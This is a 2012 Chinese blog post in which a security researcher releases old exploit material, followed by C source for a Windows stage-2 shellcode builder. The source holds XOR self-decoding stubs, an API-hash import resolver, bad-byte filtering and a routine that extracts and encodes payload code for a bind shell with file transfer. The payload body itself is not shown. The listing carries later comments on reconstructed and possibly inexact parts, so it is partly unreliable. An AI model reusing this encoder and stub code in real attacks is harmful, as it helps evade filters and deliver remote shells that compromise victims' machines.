2012-06-26 13:17:21
由于个人职业发展的原因,以后可能不会再深入研究这方面的东西了,只会当作纯粹的兴趣爱好。
我最近都在研究WEB和浏览器安全,以及安全设计方面的工作。所以为了让这些烂在我硬盘里的东西能够更好的发挥作用,能够更加的open,我决定公开这些已经烂掉的东西,也算是对自己过去的一个交代。
shellcode是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个协议,可以直接执行一个PE文件,如果是IE里的,可以对抗主动防御,可以通用不挂浏览器,文件型的功能就更多了。
躺在我硬盘里的shellcode太多了,很多我也忘记了原本的功能,也忘记了哪段代码有没有bug,哪段是最新的。如果贴错代码了,就当是POC吧
这里我贴一个简单的上传文件和下载文件的shellcode,如果以前有朋友用过我写的exploit,应该使用过这个功能,在shell里直接可以上传和下载文件。
这段shellcode是一个stage2的shellcode。这种思想是分段发送shellcode,先发送stage1 的shellcode,然后stage1的shellcode会接收stage2 的shellcode去执行。一般来说stage1 的shellcode会短小精悍,stage2 的shellcode则会比较强大。下面的shellcode是stage 2 shellcode的演示.
PS:我以后不会再公开任何漏洞利用的exploit了。
最后,再次向shellcoder们致敬。欢迎和我一起讨论任何技术问题。
/*
author: axis@ph4nt0m.org
Team: Ph4nt0m Security Team ()
Date: 2007
*/
/* The header names were lost when this listing was extracted; these are the
   ones the code below needs (printf/sprintf, memcpy/memcmp, ctype, fixed-width ints). */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
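/* Marker emitted around the body of ShellCode() (MSVC inline asm: eight NOPs).
   GetShellCode scans the compiled function for this run of 0x90 bytes to cut
   the raw machine code out of the host binary. */
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 \
                   __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

/* Not used in the visible listing.  The original definition carried a stray
   trailing ';' which would break any use such as `if (b == Xor_key)`. */
#define Xor_key 0x33

unsigned char sh_Buff[2048];    /* encoded output: decoder stub followed by payload */
unsigned int sh_Len;            /* number of valid bytes in sh_Buff (0 = build failed) */
unsigned int Enc_key = 0x99;    /* XOR key picked by GetShellCode; 0x99 is the stubs' default */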
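/*
 * Decoder stub for payloads of at most 0xFF bytes (8-bit LOOP count).
 * GetShellCode patches two bytes in place before use:
 *   [7]  = payload length (imm8 of MOV CL)
 *   [11] = XOR key        (imm8 of XOR BYTE PTR)
 *
 * 00401004   EB 0E          JMP SHORT 00401014
 * 00401006   5B             POP EBX                      ; return address = first payload byte
 * 00401007   4B             DEC EBX                      ; so [EBX+ECX], ECX=len..1, spans the payload
 * 00401008   33C9           XOR ECX,ECX
 * 0040100A   B1 FF          MOV CL,0FF                   ; payload length
 * 0040100C   80340B 99      XOR BYTE PTR DS:[EBX+ECX],99 ; key
 * 00401010   E2 FA          LOOPD SHORT 0040100C
 * 00401012   EB 05          JMP SHORT 00401019           ; into the decoded payload
 * 00401014   E8 EDFFFFFF    CALL 00401006
 *
 * Never patch a length of 0: LOOP with ECX == 0 decrements first and runs
 * 2^32 times.  Kept as a string literal on purpose: the rest of the file uses
 * sizeof(decode1)-1 as the stub length.  The split comment lines of the
 * original listing did not compile; this is the same 21 bytes.
 */
unsigned char decode1[] =
    "\xEB\x0E\x5B\x4B\x33\xC9\xB1"
    "\xFF"                                  /* [7]  shellcode size */
    "\x80\x34\x0B"
    "\x99"                                  /* [11] xor byte */
    "\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";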
/*
 * Decoder stub for payloads longer than 0xFF bytes.  Same loop as decode1,
 * but the count is a 16-bit MOV CX imm16 (little-endian at [8..9]) and the
 * XOR key sits at [13]; GetShellCode patches both.  Disassembly (ripped from
 * eyas):
 *
 * 00406030   EB 10          JMP SHORT 00406042
 * 00406032   5B             POP EBX
 * 00406033   4B             DEC EBX
 * 00406034   33C9           XOR ECX,ECX
 * 00406036   66:B9 6601     MOV CX,166
 * 0040603A   80340B 99      XOR BYTE PTR DS:[EBX+ECX],99
 * 0040603E   E2 FA          LOOPD SHORT 0040603A
 * 00406040   EB 05          JMP SHORT 00406047
 * 00406042   E8 EBFFFFFF    CALL 00406032
 *
 * String literal on purpose: sizeof(decode2)-1 is used as the stub length.
 */
unsigned char decode2[] =
    "\xEB\x10"                  /* JMP SHORT +0x10            */
    "\x5B"                      /* POP EBX                    */
    "\x4B"                      /* DEC EBX                    */
    "\x33\xC9"                  /* XOR ECX,ECX                */
    "\x66\xB9" "\x66\x01"       /* MOV CX,0166  -> [8..9] = shellcode size */
    "\x80\x34\x0B" "\x99"       /* XOR BYTE PTR [EBX+ECX],99 -> [13] = xor byte */
    "\xE2\xFA"                  /* LOOPD                      */
    "\xEB\x05"                  /* JMP SHORT into the payload */
    "\xE8\xEB\xFF\xFF\xFF";     /* CALL back to POP EBX       */
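/*
 * Byte offsets into the table the stage-2 code builds at run time.
 *
 * Slots 0x00..0x34 hold the 14 kernel32 exports and 0x38..0x68 the 13 ws2_32
 * exports, in exactly the order of functions[] below: each name's hash is
 * appended to the blob in that order, so slot 4*n belongs to hash n.
 * Everything from 0x6C on is scratch data (handles, events, buffers).
 *
 * The identifiers start with '_' + uppercase, which C reserves for the
 * implementation; they are kept because ShellCode() (not in this excerpt)
 * uses them.  The split "#define" lines of the original listing were an
 * extraction artefact and did not compile.
 */

// kernel32.dll function slots
#define _LoadLibraryA            0x00
#define _CreateProcessA          0x04
#define _TerminateProcess        0x08   /* slot 0x08 once held ExitThread (commented out in the original) */
#define _CreatePipe              0x0C
#define _CreateNamedPipeA        0x10
#define _CloseHandle             0x14
#define _CreateEventA            0x18
#define _WaitForMultipleObjects  0x1C
#define _GetOverlappedResult     0x20
#define _CreateFileA             0x24
#define _ReadFile                0x28
#define _WriteFile               0x2C
#define _WaitForSingleObjectEx   0x30
#define _Sleep                   0x34

// ws2_32.dll function slots
#define _WSAStartup              0x38
#define _WSASocketA              0x3C
#define _setsockopt              0x40
#define _bind                    0x44
#define _listen                  0x48
#define _accept                  0x4C
#define _recv                    0x50
#define _send                    0x54
#define _WSACreateEvent          0x58
#define _WSAEventSelect          0x5C
#define _WSAEnumNetworkEvents    0x60
#define _ioctlsocket             0x64
#define _closesocket             0x68

// data slots
#define _lsck   0x6C
#define _hsck   0x70   // socket handle
#define _hin0   0x74   // transferring data to subprocess: incoming handle
#define _hin1   0x78   // outgoing
#define _hout0  0x7C   // create named pipe and open it: incoming handle
#define _hout1  0x80   // outgoing
#define _pi0    0x84
#define _pi1    0x88
#define _epip   0x8C
#define _esck   0x90
#define _flg    0x94
#define _lap    0x98   // 0x14 bytes up to _cnt — the size of a 32-bit OVERLAPPED, presumably; confirm in ShellCode()
#define _cnt    0xAC
#define _pbuf   0xB0   // 0x40 bytes up to _sbuf
#define _sbuf   0xF0

// function counts: must match the two groups above and the rows of functions[]
#define _Knums  14
#define _Wnums  13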
// Need functions
/*
 * Export names whose hashes are appended to the stage-2 blob, in this order.
 * Row order is a contract: the n-th name's hash lands at offset 4*n of the
 * table the shellcode builds, which is what the _LoadLibraryA/_WSAStartup/...
 * offsets index.  The first empty row terminates the list (GetShellCode
 * stops at functions[i][0] == 0).  The rows stay writable because hash()
 * takes a non-const pointer.
 */
unsigned char functions[100][128] =
{
    /* kernel32 (_Knums = 14) */
    "LoadLibraryA",
    "CreateProcessA",
    "TerminateProcess",
    /* "ExitThread",  -- dropped together with its slot */
    "CreatePipe",
    "CreateNamedPipeA",
    "CloseHandle",
    "CreateEventA",
    "WaitForMultipleObjects",
    "GetOverlappedResult",
    "CreateFileA",
    "ReadFile",
    "WriteFile",
    "WaitForSingleObjectEx",
    "Sleep",
    /* ws2_32 (_Wnums = 13) */
    "WSAStartup",
    "WSASocketA",
    "setsockopt",
    "bind",
    "listen",
    "accept",
    "recv",
    "send",
    "WSACreateEvent",
    "WSAEventSelect",
    "WSAEnumNetworkEvents",
    "ioctlsocket",
    "closesocket",
    /* terminator */
    "",
};
void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();
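/*
 * API-name hash used by the shellcode's import resolver: for every byte of
 * the name, rotate the 32-bit accumulator right by 7 and add the byte.
 *
 * The accumulator must be exactly 32 bits wide — the resolver in the payload
 * does this in a 32-bit register — so it is a uint32_t rather than the
 * original `unsigned long`, which is 64 bits on LP64 hosts and would produce
 * hashes the shellcode never matches.  The return type stays `unsigned long`
 * for existing callers; the value always fits in 32 bits.
 *
 * c: NUL-terminated name (read only).  Returns 0 for the empty string.
 */
unsigned long hash(const unsigned char *c)
{
    uint32_t h = 0;
    while (*c) {
        h = ((h << 25) | (h >> 7)) + *c++;   /* ROR 7, then ADD */
    }
    return h;
}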
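/* True for bytes the encoded stage must not contain: '%', '=', '?', '@' and
   NUL.  CR, LF and '\\' were listed in the original but commented out, so
   they are deliberately still allowed here. */
static int sc_is_bad_byte(unsigned char b)
{
    return b == 0x26 || b == 0x3d || b == 0x3f || b == 0x40 || b == 0x00;
}

/*
 * Build the encoded stage-2 blob into the globals sh_Buff / sh_Len / Enc_key.
 *
 *  1. hash every name in functions[] (stop at the first empty row);
 *  2. locate the raw code between the PROC_BEGIN / PROC_END NOP markers of
 *     the compiled ShellCode() and copy it out;
 *  3. append the hash table (32-bit entries in host byte order — x86 host);
 *  4. take the highest key 0xFF..0x01 whose XOR leaves no bad byte in
 *     code+table, and XOR with it;
 *  5. prepend decode1 (length <= 0xFF) or decode2 (16-bit length), patching
 *     the length and key bytes into the stub.
 *
 * On any failure (marker not found, no usable key, buffer too small) sh_Len
 * is 0 and sh_Buff is unspecified.  Enc_key is only written when a key is found.
 *
 * Fixes against the original: the 0x2000-byte marker search window was also
 * the copy limit into a 2048-byte stack buffer; hashes were kept in
 * `unsigned long` (8 bytes on LP64) but copied 4 bytes apiece; the 16-bit
 * length was stored through an `unsigned short *` cast; a missing marker
 * produced a blob anyway.  The tails of the `for` headers were lost in
 * extraction — the bounds below are reconstructed from the surrounding
 * statements (pSc_addr += k+8, sh_Len = k) and should be checked against
 * the original.
 *
 * Caveat kept from the original: the stub's own bytes, including the patched
 * length and key, are not run through the bad-byte filter.
 */
void GetShellCode()
{
    /* PROC_BEGIN/PROC_END emit eight NOPs; the 9-byte literals are the
       original's, only their first 8 bytes are compared. */
    const unsigned char *fnbgn_str = (const unsigned char *)"\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    const unsigned char *fnend_str = (const unsigned char *)"\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    const unsigned int MAX_Sc_Len = 0x2000;   /* marker search window, NOT a buffer size */
    unsigned char pSc_Buff[2048];
    const unsigned char *pSc_addr;
    const unsigned char *stub;
    unsigned int stub_len;
    uint32_t dwHash[100];                     /* the payload reads 32-bit hashes */
    unsigned int dwHashSize;
    unsigned int i, j, k;
    int found_key = 0;

    /* 1. name hashes, in table order (the _xxx slot offsets depend on it) */
    for (i = 0; i < 100; i++) {
        if (functions[i][0] == '\0') break;
        dwHash[i] = (uint32_t)hash(functions[i]);
    }
    dwHashSize = i * 4;

    /* 2. cut the raw code out of the compiled ShellCode() */
    pSc_addr = (const unsigned char *)ShellCode;
    for (k = 0; k < MAX_Sc_Len; k++) {
        if (memcmp(pSc_addr + k, fnbgn_str, 8) == 0) break;
    }
    if (k == MAX_Sc_Len) { sh_Len = 0; return; }    /* PROC_BEGIN not found */
    pSc_addr += k + 8;                               /* first byte after the marker */
    for (k = 0; k < MAX_Sc_Len; k++) {
        if (memcmp(pSc_addr + k, fnend_str, 8) == 0) break;
    }
    if (k == MAX_Sc_Len) { sh_Len = 0; return; }    /* PROC_END not found */
    sh_Len = k;

    /* 3. code + hash table, bounded by the stack buffer */
    if (sh_Len + dwHashSize > sizeof pSc_Buff) { sh_Len = 0; return; }
    memcpy(pSc_Buff, pSc_addr, sh_Len);
    memcpy(pSc_Buff + sh_Len, dwHash, dwHashSize);
    sh_Len += dwHashSize;
    if (sh_Len == 0) return;    /* a zero count would make the stub's LOOP wrap around */

    /* 4. highest key that leaves no bad byte anywhere in the blob */
    for (i = 0xff; i > 0; i--) {
        for (j = 0; j < sh_Len; j++) {
            if (sc_is_bad_byte((unsigned char)(pSc_Buff[j] ^ i))) break;
        }
        if (j == sh_Len) {
            found_key = 1;
            Enc_key = i;
            for (j = 0; j < sh_Len; j++) pSc_Buff[j] ^= (unsigned char)Enc_key;
            break;
        }
    }
    if (!found_key) { sh_Len = 0; return; }

    /* 5. pick and patch the decoder stub, then assemble the final blob.
       sh_Len <= sizeof pSc_Buff here, so it always fits the 16-bit count. */
    if (sh_Len > 0xFF) {
        decode2[8]  = (unsigned char)(sh_Len & 0xFF);          /* MOV CX imm16, little-endian */
        decode2[9]  = (unsigned char)((sh_Len >> 8) & 0xFF);
        decode2[13] = (unsigned char)Enc_key;
        stub = decode2;
        stub_len = sizeof(decode2) - 1;
    } else {
        decode1[7]  = (unsigned char)sh_Len;                   /* MOV CL imm8 */
        decode1[11] = (unsigned char)Enc_key;
        stub = decode1;
        stub_len = sizeof(decode1) - 1;
    }
    if (stub_len + sh_Len > sizeof sh_Buff) { sh_Len = 0; return; }
    memcpy(sh_Buff, stub, stub_len);
    memcpy(sh_Buff + stub_len, pSc_Buff, sh_Len);
    sh_Len += stub_len;
}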
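/*
 * Dump buffsize bytes of lpBuff to stdout as a C string literal: a byte-count
 * header comment, then 16 bytes per line as lowercase "\xNN" escapes, closed
 * with `";`.
 *
 * Fixes against the original: each byte was formatted into `char msg[4]`
 * with sprintf("\\x%.2X"), which writes 5 bytes (4 characters plus the NUL)
 * — a stack overflow on every iteration — and lower-cased through the
 * non-standard _tolower() macro.  printf("\\x%02x") yields the same text
 * directly.  A NULL buffer is printed as zero bytes instead of dereferenced.
 *
 * lpBuff:   bytes to print (non-const only to match the prototype above).
 * buffsize: number of bytes; values <= 0 print just the header and `";`.
 */
void PrintSc(unsigned char *lpBuff, int buffsize)
{
    int i;

    if (lpBuff == NULL) buffsize = 0;
    printf("/* %d bytes */\n", buffsize);
    for (i = 0; i < buffsize; i++) {
        if (i % 16 == 0) {
            /* close the previous literal line before opening the next one */
            if (i != 0) printf("\"\n\"");
            else        printf("\"");
        }
        printf("\\x%02x", lpBuff[i] & 0xff);
    }
    printf("\";\n");
}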